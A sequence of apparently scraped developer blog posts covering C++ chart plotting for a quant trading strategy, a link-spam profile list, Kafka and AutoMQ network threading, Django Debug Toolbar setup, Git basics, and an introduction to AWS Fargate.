{"type":"candlestick", "name":"Long Spread","data":[], "id":"dataseriesA"},
{"type":"flags","data":[], "onSeries": "dataseriesA"}
]
},
{
"extension": { "layout": "single", "col": 6, "height": "500px"},
"rangeSelector": {"enabled": false},
    "tooltip": {"xDateFormat": "%Y-%m-%d %H:%M:%S, %A"},
    "plotOptions": {"candlestick": {"color": "#d75442", "upColor": "#6ba583"}},
"chart":{"type":"line"},
"title":{"text":"Spread Short"},
"xAxis":{"title":{"text":"Date"}},
"series":[
    {"type":"candlestick", "name":"Short Spread","data":[], "id":"dataseriesA"},
{"type":"flags","data":[], "onSeries": "dataseriesA"}
]
}
]
)EOF";
_c.update(_cfgStr); // Update chart objects with chart configuration
_c.reset(); // Reset chart data.
```
When the strategy code needs to insert data into the chart, it either calls the member functions of the _c object directly, or passes a reference to _c as a parameter and then calls _c's member functions (methods) to update or insert chart data. For example:
```
_c.add(chartIdx, {{"x", UnixNano()/1000000}, {"title", action}, {"text", format("diff: %f", opPrice)}, {"color", color}});
```
After placing an order, the K-line chart is marked. As shown below, when drawing the K-line, a pointer to the chart object _c is passed as a parameter when calling the member function feed of the BarFeeder class.
```
void feed(double price, chart *c=nullptr, int chartIdx=0)
```
That is, the formal parameter c of the feed function.
```
json point = {bar.Time, bar.Open, bar.High, bar.Low, bar.Close}; // construct a json type data point
if (c != nullptr) {                  // only draw if a chart object pointer was passed in
    if (newBar) {                    // a new bar has appeared
        c->add(chartIdx, point);     // call the chart object's member function "add" to insert a new K-line bar
        c->reset(1000);              // keep only the most recent 1000 bars
    } else {
        c->add(chartIdx, point, -1); // not a new bar: update the current (last) bar
    }
}
```
Insert a new K-line Bar data into the chart by calling the add member function of the chart object _c.
```
c->add(chartIdx, point);
```
## Backtest


This strategy is for learning and communication purposes only. When applying it to a real market, please modify and optimize it according to actual market conditions.
Strategy address: https://www.fmz.com/strategy/163447
More interesting strategies can be found on the FMZ Quant platform: https://www.fmz.com
From: https://blog.mathquant.com/2019/08/29/c-version-of-okex-futures-contract-hedging-strategy-that-takes-you-through-hardcore-quantitative-strategy.html (author: fmzquant)

---

# Mandala Cham Bay Mui Ne

Published 2024-06-07 · https://dev.to/mandalamuine/mandala-cham-bay-mui-ne-796 · by mandalamuine

http://molbiol.ru/forums/index.php?showuser=1354461
https://pastelink.net/04204oog
https://answerpail.com/index.php/user/mandalamuine
https://telegra.ph/mandalamuine-06-07-2
https://app.roll20.net/users/13420797/mandala
https://www.chordie.com/forum/profile.php?id=1972650
https://www.spoiledmaltese.com/members/mandalamuine.170405/#about
https://readthedocs.org/projects/httpsmandalachambaymuinecom/
https://jsfiddle.net/user/mandalamuine/
https://linktr.ee/tumandalamuine
https://vocal.media/authors/mandala-cham-bay-mui-ne
https://participa.gencat.cat/profiles/mandalamuine/timeline?locale=en
https://www.beatstars.com/mandalachambaymuineofficial/about
https://allmylinks.com/mandalamuine
http://forum.yealink.com/forum/member.php?action=profile&uid=345622
https://www.hahalolo.com/@6662725d0694371ea491bae3
https://fileforum.com/profile/mandalamuine
https://tupalo.com/en/users/6829959
https://8tracks.com/mandalamuine
https://filesharingtalk.com

---

# ZhongAn Insurance's Wang Kai Analyzes Kafka Network Communication

Published 2024-06-07 · https://dev.to/automq/zhongan-insurances-wang-kai-analyzes-kafka-network-communication-1p6i · tags: kafka · by automq

Author: Kai Wang, Java Development Expert at ZhongAn Online Insurance Basic Platform
## Introduction
Today, we explore the core workflow of network communication in Kafka, specifically focusing on Apache Kafka 3.7[2]. This discussion also includes insights into the increasingly popular AutoMQ, highlighting its network communication optimizations and enhancements derived from Kafka.
## I. How to Construct a Basic Request and Handle Responses
As a message queue, network communication essentially involves two key aspects:
- Communication between message producers and the message queue server (in Kafka, this involves producers "pushing" messages to the queue)
- Communication between message consumers and the message queue server (in Kafka, this involves consumers "pulling" messages from the queue)

This diagram primarily illustrates the process from message dispatch to response reception.
Client:
1. KafkaProducer initializes the Sender thread
2. The Sender thread retrieves batched data from the RecordAccumulator (for detailed client-side sending, see [https://mp.weixin.qq.com/s/J2_O1l81duknfdFvHuBWxw])
3. The Sender thread employs the NetworkClient to check the connection status and initiates a connection if necessary
4. The Sender thread invokes the NetworkClient's doSend method to transmit data to the KafkaChannel
5. The Sender thread calls the NetworkClient's poll method (which drives the underlying Selector) for the actual data transmission
Server:
1. KafkaServer initializes SocketServer, dataPlaneRequestProcessor (KafkaApis), and dataPlaneRequestHandlerPool
2. SocketServer sets up the RequestChannel and dataPlaneAcceptor
3. The dataPlaneAcceptor takes charge of acquiring connections and delegating tasks to the appropriate Processor
4. The Processor thread pulls tasks from the newConnections queue for processing
5. Processor threads handle the ready I/O events:
- `configureNewConnections()`: Establish new connections
- `processNewResponses()`: Dispatch Response and enqueue it in the inflightResponses temporary queue
- `poll()`: Execute NIO polling to retrieve ready I/O operations on the respective SocketChannel
- `processCompletedReceives()`: Enqueue received Requests in the RequestChannel queue
- `processCompletedSends()`: Implement callback logic for Responses in the temporary Response queue
- `processDisconnected()`: Handle connections that have been disconnected due to send failures
- `closeExcessConnections()`: Terminate connections that surpass quota limits
6. The KafkaRequestHandler retrieves the ready events from the RequestChannel and assigns them to the appropriate KafkaApi for processing.
7. After processing by the KafkaApi, the response is returned to the RequestChannel.
8. The Processor thread then delivers the response to the client.
This completes a full cycle of message transmission in Kafka, encompassing both client and server processing steps.
## Ⅱ. Kafka Network Communication
**1. Server-side Communication Thread Model**
Unlike RocketMQ, which relies on Netty for efficient network communication, Kafka uses Java NIO to implement a master-slave Reactor pattern for network communication (for further information, see [https://jenkov.com/tutorials/java-nio/overview.html]).

Both DataPlaneAcceptor and ControlPlaneAcceptor are subclasses of Acceptor, a thread class implementing the Runnable interface. The primary job of an Acceptor is to listen for and accept connections between clients and brokers, set up the transmission channels (SocketChannel), and hand them to Processors in a round-robin fashion. A RequestChannel (backed by an ArrayBlockingQueue) connects the Processors and the Handlers. The MainReactor (Acceptor) handles only the OP_ACCEPT event; once it is detected, the SocketChannel is forwarded to a SubReactor (Processor). Each Processor has its own Selector; the SubReactors listen for and process the remaining events, ultimately handing the actual requests to the KafkaRequestHandlerPool.
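The handoff can be modeled without real sockets (Python; `Acceptor` and `Processor` below are toy stand-ins for the Kafka classes, showing only the round-robin delegation of accepted connections):

```python
from collections import deque

class Processor:
    """Toy SubReactor: owns a newConnections queue, like Kafka's Processor."""
    def __init__(self, pid):
        self.pid = pid
        self.new_connections = deque()

    def accept(self, conn):
        # Later drained by the processor's configureNewConnections() step.
        self.new_connections.append(conn)

class Acceptor:
    """Toy MainReactor: only 'handles OP_ACCEPT', then delegates round-robin."""
    def __init__(self, processors):
        self.processors = processors
        self.next = 0

    def on_accept(self, conn):
        p = self.processors[self.next % len(self.processors)]
        self.next += 1
        p.accept(conn)
        return p.pid

procs = [Processor(i) for i in range(3)]
acceptor = Acceptor(procs)
assignments = [acceptor.on_accept(f"conn-{c}") for c in range(7)]
print(assignments)   # [0, 1, 2, 0, 1, 2, 0]
```

Once a SocketChannel lands in a Processor's queue, that Processor's own Selector owns all further I/O for the connection, which is what makes the pattern "master-slave".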
**2. Initialization of the main components in the thread model**

The diagram illustrates that during the broker startup, the KafkaServer's startup method is invoked (assuming it operates in zookeeper mode)
The startup method primarily establishes:
1. KafkaApis handlers: creating dataPlaneRequestProcessor and controlPlaneRequestProcessor
2. KafkaRequestHandlerPool: forming dataPlaneRequestHandlerPool and controlPlaneRequestHandlerPool
3. Initialization of socketServer
4. Establishment of controlPlaneAcceptorAndProcessor and dataPlaneAcceptorAndProcessor
Additionally, an important step not depicted in the diagram but included in the startup method is starting the threads: enableRequestProcessing is invoked on the initialized socketServer.
**3. Addition and Removal of Processors**
1. Addition
- Processors are added when the broker starts
- Actively adjusting num.network.threads changes the number of processing threads
2. Startup
- Processors start when the broker launches the Acceptor
- Newly added processing threads that were not yet running are started after an upward adjustment
3. Removal from the queue and destruction
- On broker shutdown
- Actively adjusting num.network.threads downward removes excess threads and closes them

**4. KafkaRequestHandlerPool and KafkaRequestHandler**
**1. KafkaRequestHandlerPool**
The primary place where Kafka requests are processed: a request-handling thread pool responsible for creating, maintaining, managing, and tearing down its request-handling threads.
**2. KafkaRequestHandler**
The actual business request-handling thread class; each instance retrieves request objects from the SocketServer's RequestChannel queue and processes them.
Below is the method body processed by KafkaRequestHandler:
```
def run(): Unit = {
threadRequestChannel.set(requestChannel)
while (!stopped) {
// We use a single meter for aggregate idle percentage for the thread pool.
// Since meter is calculated as total_recorded_value / time_window and
// time_window is independent of the number of threads, each recorded idle
// time should be discounted by # threads.
val startSelectTime = time.nanoseconds
      // Fetch the next pending request from the request queue
val req = requestChannel.receiveRequest(300)
val endTime = time.nanoseconds
val idleTime = endTime - startSelectTime
aggregateIdleMeter.mark(idleTime / totalHandlerThreads.get)
req match {
case RequestChannel.ShutdownRequest =>
debug(s"Kafka request handler $id on broker $brokerId received shut down command")
completeShutdown()
return
case callback: RequestChannel.CallbackRequest =>
val originalRequest = callback.originalRequest
try {
// If we've already executed a callback for this request, reset the times and subtract the callback time from the
// new dequeue time. This will allow calculation of multiple callback times.
// Otherwise, set dequeue time to now.
if (originalRequest.callbackRequestDequeueTimeNanos.isDefined) {
val prevCallbacksTimeNanos = originalRequest.callbackRequestCompleteTimeNanos.getOrElse(0L) - originalRequest.callbackRequestDequeueTimeNanos.getOrElse(0L)
originalRequest.callbackRequestCompleteTimeNanos = None
originalRequest.callbackRequestDequeueTimeNanos = Some(time.nanoseconds() - prevCallbacksTimeNanos)
} else {
originalRequest.callbackRequestDequeueTimeNanos = Some(time.nanoseconds())
}
threadCurrentRequest.set(originalRequest)
callback.fun(requestLocal)
} catch {
case e: FatalExitError =>
completeShutdown()
Exit.exit(e.statusCode)
case e: Throwable => error("Exception when handling request", e)
} finally {
// When handling requests, we try to complete actions after, so we should try to do so here as well.
apis.tryCompleteActions()
if (originalRequest.callbackRequestCompleteTimeNanos.isEmpty)
originalRequest.callbackRequestCompleteTimeNanos = Some(time.nanoseconds())
threadCurrentRequest.remove()
}
        // In the normal case, KafkaApis.handle executes the corresponding processing logic
case request: RequestChannel.Request =>
try {
request.requestDequeueTimeNanos = endTime
trace(s"Kafka request handler $id on broker $brokerId handling request $request")
threadCurrentRequest.set(request)
apis.handle(request, requestLocal)
} catch {
case e: FatalExitError =>
completeShutdown()
Exit.exit(e.statusCode)
case e: Throwable => error("Exception when handling request", e)
} finally {
threadCurrentRequest.remove()
request.releaseBuffer()
}
case RequestChannel.WakeupRequest =>
// We should handle this in receiveRequest by polling callbackQueue.
warn("Received a wakeup request outside of typical usage.")
case null => // continue
}
}
completeShutdown()
}
```
Here, the `RequestChannel.Request` branch hands the request over to KafkaApis's handle method for processing.
## Ⅲ. Unified Request Handling Dispatch
The primary business processing class in Kafka is KafkaApis, which sits at the core of all the communication and threading work described above.
```
override def handle(request: RequestChannel.Request, requestLocal: RequestLocal): Unit = {
def handleError(e: Throwable): Unit = {
error(s"Unexpected error handling request ${request.requestDesc(true)} " +
s"with context ${request.context}", e)
requestHelper.handleError(request, e)
}
try {
trace(s"Handling request:${request.requestDesc(true)} from connection ${request.context.connectionId};" +
s"securityProtocol:${request.context.securityProtocol},principal:${request.context.principal}")
if (!apiVersionManager.isApiEnabled(request.header.apiKey, request.header.apiVersion)) {
// The socket server will reject APIs which are not exposed in this scope and close the connection
// before handing them to the request handler, so this path should not be exercised in practice
throw new IllegalStateException(s"API ${request.header.apiKey} with version ${request.header.apiVersion} is not enabled")
}
request.header.apiKey match {
case ApiKeys.PRODUCE => handleProduceRequest(request, requestLocal)
case ApiKeys.FETCH => handleFetchRequest(request)
case ApiKeys.LIST_OFFSETS => handleListOffsetRequest(request)
case ApiKeys.METADATA => handleTopicMetadataRequest(request)
case ApiKeys.LEADER_AND_ISR => handleLeaderAndIsrRequest(request)
case ApiKeys.STOP_REPLICA => handleStopReplicaRequest(request)
case ApiKeys.UPDATE_METADATA => handleUpdateMetadataRequest(request, requestLocal)
case ApiKeys.CONTROLLED_SHUTDOWN => handleControlledShutdownRequest(request)
case ApiKeys.OFFSET_COMMIT => handleOffsetCommitRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.OFFSET_FETCH => handleOffsetFetchRequest(request).exceptionally(handleError)
case ApiKeys.FIND_COORDINATOR => handleFindCoordinatorRequest(request)
case ApiKeys.JOIN_GROUP => handleJoinGroupRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.HEARTBEAT => handleHeartbeatRequest(request).exceptionally(handleError)
case ApiKeys.LEAVE_GROUP => handleLeaveGroupRequest(request).exceptionally(handleError)
case ApiKeys.SYNC_GROUP => handleSyncGroupRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.DESCRIBE_GROUPS => handleDescribeGroupsRequest(request).exceptionally(handleError)
case ApiKeys.LIST_GROUPS => handleListGroupsRequest(request).exceptionally(handleError)
case ApiKeys.SASL_HANDSHAKE => handleSaslHandshakeRequest(request)
case ApiKeys.API_VERSIONS => handleApiVersionsRequest(request)
case ApiKeys.CREATE_TOPICS => maybeForwardToController(request, handleCreateTopicsRequest)
case ApiKeys.DELETE_TOPICS => maybeForwardToController(request, handleDeleteTopicsRequest)
case ApiKeys.DELETE_RECORDS => handleDeleteRecordsRequest(request)
case ApiKeys.INIT_PRODUCER_ID => handleInitProducerIdRequest(request, requestLocal)
case ApiKeys.OFFSET_FOR_LEADER_EPOCH => handleOffsetForLeaderEpochRequest(request)
case ApiKeys.ADD_PARTITIONS_TO_TXN => handleAddPartitionsToTxnRequest(request, requestLocal)
case ApiKeys.ADD_OFFSETS_TO_TXN => handleAddOffsetsToTxnRequest(request, requestLocal)
case ApiKeys.END_TXN => handleEndTxnRequest(request, requestLocal)
case ApiKeys.WRITE_TXN_MARKERS => handleWriteTxnMarkersRequest(request, requestLocal)
case ApiKeys.TXN_OFFSET_COMMIT => handleTxnOffsetCommitRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.DESCRIBE_ACLS => handleDescribeAcls(request)
case ApiKeys.CREATE_ACLS => maybeForwardToController(request, handleCreateAcls)
case ApiKeys.DELETE_ACLS => maybeForwardToController(request, handleDeleteAcls)
case ApiKeys.ALTER_CONFIGS => handleAlterConfigsRequest(request)
case ApiKeys.DESCRIBE_CONFIGS => handleDescribeConfigsRequest(request)
case ApiKeys.ALTER_REPLICA_LOG_DIRS => handleAlterReplicaLogDirsRequest(request)
case ApiKeys.DESCRIBE_LOG_DIRS => handleDescribeLogDirsRequest(request)
case ApiKeys.SASL_AUTHENTICATE => handleSaslAuthenticateRequest(request)
case ApiKeys.CREATE_PARTITIONS => maybeForwardToController(request, handleCreatePartitionsRequest)
// Create, renew and expire DelegationTokens must first validate that the connection
// itself is not authenticated with a delegation token before maybeForwardToController.
case ApiKeys.CREATE_DELEGATION_TOKEN => handleCreateTokenRequest(request)
case ApiKeys.RENEW_DELEGATION_TOKEN => handleRenewTokenRequest(request)
case ApiKeys.EXPIRE_DELEGATION_TOKEN => handleExpireTokenRequest(request)
case ApiKeys.DESCRIBE_DELEGATION_TOKEN => handleDescribeTokensRequest(request)
case ApiKeys.DELETE_GROUPS => handleDeleteGroupsRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.ELECT_LEADERS => maybeForwardToController(request, handleElectLeaders)
case ApiKeys.INCREMENTAL_ALTER_CONFIGS => handleIncrementalAlterConfigsRequest(request)
case ApiKeys.ALTER_PARTITION_REASSIGNMENTS => maybeForwardToController(request, handleAlterPartitionReassignmentsRequest)
case ApiKeys.LIST_PARTITION_REASSIGNMENTS => maybeForwardToController(request, handleListPartitionReassignmentsRequest)
case ApiKeys.OFFSET_DELETE => handleOffsetDeleteRequest(request, requestLocal).exceptionally(handleError)
case ApiKeys.DESCRIBE_CLIENT_QUOTAS => handleDescribeClientQuotasRequest(request)
case ApiKeys.ALTER_CLIENT_QUOTAS => maybeForwardToController(request, handleAlterClientQuotasRequest)
case ApiKeys.DESCRIBE_USER_SCRAM_CREDENTIALS => handleDescribeUserScramCredentialsRequest(request)
case ApiKeys.ALTER_USER_SCRAM_CREDENTIALS => maybeForwardToController(request, handleAlterUserScramCredentialsRequest)
case ApiKeys.ALTER_PARTITION => handleAlterPartitionRequest(request)
case ApiKeys.UPDATE_FEATURES => maybeForwardToController(request, handleUpdateFeatures)
case ApiKeys.ENVELOPE => handleEnvelope(request, requestLocal)
case ApiKeys.DESCRIBE_CLUSTER => handleDescribeCluster(request)
case ApiKeys.DESCRIBE_PRODUCERS => handleDescribeProducersRequest(request)
case ApiKeys.UNREGISTER_BROKER => forwardToControllerOrFail(request)
case ApiKeys.DESCRIBE_TRANSACTIONS => handleDescribeTransactionsRequest(request)
case ApiKeys.LIST_TRANSACTIONS => handleListTransactionsRequest(request)
case ApiKeys.ALLOCATE_PRODUCER_IDS => handleAllocateProducerIdsRequest(request)
case ApiKeys.DESCRIBE_QUORUM => forwardToControllerOrFail(request)
case ApiKeys.CONSUMER_GROUP_HEARTBEAT => handleConsumerGroupHeartbeat(request).exceptionally(handleError)
case ApiKeys.CONSUMER_GROUP_DESCRIBE => handleConsumerGroupDescribe(request).exceptionally(handleError)
case ApiKeys.GET_TELEMETRY_SUBSCRIPTIONS => handleGetTelemetrySubscriptionsRequest(request)
case ApiKeys.PUSH_TELEMETRY => handlePushTelemetryRequest(request)
case ApiKeys.LIST_CLIENT_METRICS_RESOURCES => handleListClientMetricsResources(request)
case _ => throw new IllegalStateException(s"No handler for request api key ${request.header.apiKey}")
}
} catch {
case e: FatalExitError => throw e
case e: Throwable => handleError(e)
} finally {
// try to complete delayed action. In order to avoid conflicting locking, the actions to complete delayed requests
// are kept in a queue. We add the logic to check the ReplicaManager queue at the end of KafkaApis.handle() and the
// expiration thread for certain delayed operations (e.g. DelayedJoin)
// Delayed fetches are also completed by ReplicaFetcherThread.
replicaManager.tryCompleteActions()
// The local completion time may be set while processing the request. Only record it if it's unset.
if (request.apiLocalCompleteTimeNanos < 0)
request.apiLocalCompleteTimeNanos = time.nanoseconds
}
}
```
From the code above, the key collaborating components are identifiable: the ReplicaManager, which manages replicas; the GroupCoordinator, which oversees consumer groups; the KafkaController, which runs the Controller component; and the server-side handlers behind the most frequently used client operations, KafkaProducer.send (producing messages) and KafkaConsumer.poll (consuming messages).
## IV. AutoMQ Thread Model
**1. Optimization of Processing Threads**
AutoMQ, drawing inspiration from the CPU pipeline, refines Kafka's processing model into a pipeline mode, striking a balance between sequentiality and efficiency.
- Sequentiality: Each TCP connection is tied to a single thread, with one network thread dedicated to request parsing and one RequestHandler thread responsible for processing the business logic;
- Efficiency: The stages are pipelined, allowing a network thread to parse MSG2 immediately after finishing MSG1, without waiting for MSG1’s persistence. Similarly, once the RequestHandler completes verification and sequencing of MSG1, it can start processing MSG2 right away. To further improve persistence efficiency, AutoMQ groups data into batches for disk storage.
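A minimal pipeline sketch (Python threads and queues standing in for the network thread and the RequestHandler thread; the message names and sentinel shutdown are invented). Because each stage is single-threaded, per-connection order is preserved, yet stage 1 can parse the next message while stage 2 is still handling the previous one:

```python
import queue
import threading

raw_in = queue.Queue()   # bytes from the TCP connection (into stage 1)
parsed = queue.Queue()   # decoded requests (stage 1 -> stage 2)
done = []                # "persisted" messages, in completion order

def network_thread():
    """Stage 1: parse requests; never waits for downstream persistence."""
    while True:
        msg = raw_in.get()
        if msg is None:               # shutdown sentinel
            parsed.put(None)
            return
        parsed.put(("parsed", msg))   # hand off, then parse the next one

def handler_thread():
    """Stage 2: verify/sequence/persist, strictly in arrival order."""
    while True:
        item = parsed.get()
        if item is None:
            return
        done.append(item[1])

t1 = threading.Thread(target=network_thread)
t2 = threading.Thread(target=handler_thread)
t1.start(); t2.start()
for i in range(5):
    raw_in.put(f"MSG{i}")
raw_in.put(None)
t1.join(); t2.join()
print(done)   # ['MSG0', 'MSG1', 'MSG2', 'MSG3', 'MSG4'], order preserved
```

The single queue between the stages is the ordering guarantee; batching for disk, as AutoMQ does, would simply drain several items from `parsed` at once in stage 2.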
**2. Optimization of the RequestChannel**
AutoMQ has redesigned the RequestChannel into a multi-queue architecture, allowing requests from the same connection to be consistently directed to the same queue and handled by a specific KafkaRequestHandler, thus ensuring orderly processing during the verification and sequencing stages.
Each queue is directly linked to a particular KafkaRequestHandler, maintaining a one-to-one relationship.
After the Processor decodes a request, it assigns it to a specific queue using the formula hash(channelId) % N.
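The routing rule itself is a one-liner; here is a deterministic sketch (CRC32 is used instead of Python's per-process randomized `hash`; that substitution is an implementation choice of this sketch, not necessarily AutoMQ's):

```python
import zlib

N = 4  # number of queues / bound KafkaRequestHandlers (example value)

def queue_for(channel_id: str) -> int:
    """Map a connection's channelId to a fixed queue index."""
    return zlib.crc32(channel_id.encode()) % N

# Every request from one connection lands in the same queue, so the
# verification and sequencing stages stay ordered per connection.
first = queue_for("192.168.1.10:51334-broker1")
assert all(queue_for("192.168.1.10:51334-broker1") == first for _ in range(100))
print(0 <= first < N)   # True
```

Because each queue is consumed by exactly one KafkaRequestHandler, this mapping gives per-connection ordering without any cross-thread locking.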
## References
[1] AutoMQ: https://github.com/AutoMQ/automq
[2] Kafka 3.7: https://github.com/apache/kafka/releases/tag/3.7.0
[3] Java NIO: https://jenkov.com/tutorials/java-nio/overview.html
[4] AutoMQ Thread Optimization: https://mp.weixin.qq.com/s/kDZJgUnMoc5K8jTuV08OJw

---

# Django Debug Toolbar Setup

Published 2024-06-07 · https://dev.to/hasancse/django-debug-toolbar-setup-1f3j · tags: django, python, webdev, programming · by hasancse

## **What is Django Debug Toolbar?**
The Django Debug Toolbar is a configurable set of panels that display various debug information about the current request/response and, when clicked, display more details about the panel’s content.
## **How to install and implement Django Debug Toolbar?**
To install the Django Debug Toolbar, you need an existing Django project; you can use pip, with or without a virtual environment. If you don't want to use pip, you can get the code from the project's repository (https://github.com/jazzband/django-debug-toolbar) and place it in your Django project path, but the pip installation is easier and is what I will focus on here.
For installation, I recommend using a virtual environment and executing this command:
```
$ pip install django-debug-toolbar
```
The configuration of this component is simple, you just need to change your project’s urls.py and settings.py to use the toolbar.
In your project’s urls.py, enter this code:
```
from django.conf import settings
from django.urls import include, path # For Django 2.0 and up
import debug_toolbar
urlpatterns = [
#...
path('__debug__/', include(debug_toolbar.urls)),
#...
]
```
_Take care with the imports, as some of them may already exist in your urls.py._
Now, in your project's settings.py, make sure that debug mode is enabled:
```
DEBUG = True
```
Add debug_toolbar and make sure django.contrib.staticfiles exists in INSTALLED_APPS.
```
INSTALLED_APPS = [
#...
'django.contrib.staticfiles',
#...
'debug_toolbar',
#...
]
```
Add this line to MIDDLEWARE
```
MIDDLEWARE = [
#...
'debug_toolbar.middleware.DebugToolbarMiddleware',
#...
]
```
Add INTERNAL_IPS to settings.py. This configuration is valid for a local development environment; if your dev environment is different, just change this field to your valid configuration.
```
INTERNAL_IPS = ('127.0.0.1', '0.0.0.0', 'localhost',)
```
Add DEBUG_TOOLBAR_PANELS in settings.py
```
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
]
```
**You did it!**
This is the default configuration and if you want to see more options, you can see this page:
https://django-debug-toolbar.readthedocs.io/en/stable/configuration.html
Note: It is very important that your base template contains a closing `</body>` tag, because the Django Debug Toolbar is injected just before it.
This component has a variety of panels that can be added through the configuration. These panels show different information related to HTTP requests/responses and other relevant debug data. At this URL, you can see all the default panels and learn how to use and configure them: http://django-debug-toolbar.readthedocs.io/en/stable/panels.html | hasancse |
1,879,819 | Git for Beginners, the Introduction... | If you are starting in the world of programming, you have surely heard of Git, but you might not... | 27,814 | 2024-06-07T03:11:36 | https://dev.to/andresordazrs/git-for-beginners-the-introduction-2g9e | git, beginners, developer | If you are starting in the world of programming, you have surely heard of Git, but you might not fully understand what it is or why it is so important. Don’t worry, we've all been there.
Learning Git can seem challenging at first, but I promise that by the end of this article, you will understand why it is an essential tool for any programmer and how it can make your life much easier.
Let's discover together the fascinating world of Git and why mastering it will give you a significant advantage in your career as a developer.
**What is Git?**
So, what is Git? In simple terms, Git is a version control system. But what does that really mean? Imagine you are writing a book. Every day you make changes: adding chapters, correcting errors, improving the content. Wouldn't it be great to have a way to save each version of the book so that if you make a mistake, you can revert to a previous version without losing all your work? That is exactly what Git does, but instead of a book, you do it with your code.
To make it even clearer, think of Google Drive or Dropbox. When you upload a file and then modify it, these services save the previous versions of the file. So, if you accidentally delete something important, you can recover the previous version. Git does this and much more, allowing you not only to save versions of your code but also to collaborate efficiently with others.
**Why is Git Important?**
Now that you have a basic idea of what Git is, let's talk about why it is so important. Firstly, Git allows you to keep a detailed record of all changes to your code. This is crucial because as your project grows, it can be difficult to remember what changes you made and when.
Another key reason is collaboration. If you are working on a project with other people, Git allows you to combine everyone’s work in an organized manner. Imagine you and your friends are writing an essay together. Each one writes a section, but in the end, someone has to put all the parts together. With Git, this process is automatic and avoids conflicts.
Additionally, Git is used in real, large projects. Companies like Google, Facebook, and Microsoft use Git to manage their code. This means that by learning Git, you are acquiring a skill that is valued in the job market.
**Initial Difficulties with Git**
It is true that Git can be intimidating at first. Here are some key concepts that are usually confusing for beginners:
**- Repositories (Repos):** Think of a repository as a folder for your project, where all versions of your code are stored.
**- Commits:** A commit is like taking a snapshot of your project at a specific moment. Each time you make a commit, you are saving a new version of your project.
**- Branches:** Branches allow you to work on different parts of your project simultaneously without interfering with the main code. Imagine you are building a house and can work on several rooms at once without the work in one affecting the other.
To help you overcome these difficulties, there are many tools and resources available. For example, GitHub has an excellent guide for beginners, and there are many tutorials and online courses that can help you better understand how Git works.
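To make these concepts concrete, here is a minimal first session with Git on the command line (the folder, file, and commit message names are just examples):

```shell
cd "$(mktemp -d)"                         # a scratch folder for the demo
git init -q .                             # create a repository (the "repo")
git config user.email "you@example.com"   # tell Git who you are
git config user.name "Your Name"
echo "Chapter 1" > book.txt
git add book.txt                          # stage the change
git commit -q -m "Add chapter 1"          # commit: a snapshot of the project
git branch experiment                     # a branch to try ideas safely
git log --oneline                         # the saved history
```

That is the whole loop: edit, stage, commit, and branch when you want to experiment without touching your main work.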
**Git and the Importance of Learning It**
Learning Git is not just an option; it is a necessity. Here are some reasons why it is fundamental:
**- Problem Solving:** With Git, you can track errors to their source. If something stops working, you can review previous commits to find when and where the problem was introduced.
**- Safe Experimentation:** You can create branches to try new ideas without fear of messing up your main code. If the new idea doesn’t work, you can simply discard the branch.
**- Detailed History:** Each commit includes a message that describes what you changed and why. This is incredibly useful for remembering why you made certain changes and for helping others understand your work.
**Platforms and Tools Related to Git**
Now that you know what Git is and why it is important, let’s look at some platforms and tools that make using Git even easier:
**- GitHub:** The most popular platform for hosting Git repositories. It offers tools for code review, project management, and collaboration with other developers.
**- GitLab:** Similar to GitHub but with more emphasis on continuous integration and continuous delivery (CI/CD). It is ideal for teams that want to automate their workflow.
**- Bitbucket:** Another alternative, especially popular among teams already using other Atlassian tools like Jira. Bitbucket integrates perfectly with these tools.
**Git in the Workplace**
In the workplace, Git is an essential and highly valued skill for developers. Companies seek professionals who know how to use Git because it greatly facilitates team collaboration, allowing several developers to work simultaneously on the same project without conflicts or information loss.
Git helps manage large and complex projects efficiently, which is crucial for software development at an enterprise scale. Additionally, using Git shows that you understand and apply best practices in software development, enhancing your professionalism and attractiveness to employers. In summary, mastering Git not only improves your technical ability but also prepares you to effectively integrate into work teams in a professional environment.
In conclusion, Git is a powerful tool that every programmer should learn. It not only helps you manage your code efficiently but also prepares you to work in teams and on large projects. Although it can be a bit difficult at first, with practice and patience, you will realize that it is an invaluable skill. So, don’t get discouraged and keep practicing.
Happy coding! | andresordazrs |
1,879,817 | Running Containers at Scale: A Deep Dive into AWS Fargate | Running Containers at Scale: A Deep Dive into AWS Fargate Introduction In... | 0 | 2024-06-07T03:07:37 | https://dev.to/virajlakshitha/running-containers-at-scale-a-deep-dive-into-aws-fargate-4mb0 | # Running Containers at Scale: A Deep Dive into AWS Fargate
### Introduction
In today's rapidly evolving technological landscape, containerization has emerged as a cornerstone of modern application development and deployment. Containers offer a lightweight and portable solution for packaging applications with their dependencies, ensuring consistency across different environments. As organizations increasingly embrace containerized workloads, the need for a scalable and managed container orchestration service becomes paramount. This is where AWS Fargate comes into play, offering a serverless compute engine for containers that abstracts away the complexities of cluster management and infrastructure provisioning.
### Understanding AWS Fargate
AWS Fargate is a serverless compute engine for containers that allows you to run containers without having to manage servers or clusters. With Fargate, you no longer need to provision, configure, or scale clusters of virtual machines to run your containers. Instead, you can focus solely on building and deploying your applications, while Fargate handles all the underlying infrastructure management.
### Key Concepts
- **Tasks:** A task is the fundamental unit of execution in Fargate. It represents a single running container or a group of containers defined in a task definition.
- **Task Definitions:** A task definition serves as a blueprint that specifies the container image, resource requirements (CPU, memory), networking configuration, and other parameters for your tasks.
- **Clusters:** While Fargate eliminates the need for you to manage clusters directly, you still need to associate your tasks with a cluster for organizational purposes and to leverage other AWS services like load balancing and service discovery.
- **Execution Roles:** Execution roles grant permissions to your tasks to interact with other AWS services, such as accessing data in Amazon S3 or publishing logs to Amazon CloudWatch.
- **Networking Modes:** Fargate supports multiple networking modes, including `awsvpc` for running tasks in your own VPC and `host` for sharing the host's networking namespace (suitable for specific use cases).
